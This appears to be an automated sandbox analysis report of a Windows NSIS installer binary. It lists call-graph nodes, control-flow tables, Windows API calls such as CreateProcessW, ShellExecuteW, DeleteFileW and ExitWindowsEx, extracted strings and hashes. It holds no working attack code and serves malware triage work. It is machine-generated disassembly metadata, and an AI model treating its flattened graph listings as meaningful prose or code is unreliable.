404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                        • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429574,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                      • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                      • API String ID: 2110491804-1641061399
                                                                                                                                                                                      • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                      • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                      • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                      • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                      • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                      • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                      • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                      • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                      • API String ID: 2435955865-3712954417
                                                                                                                                                                                      • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                      • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                      • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
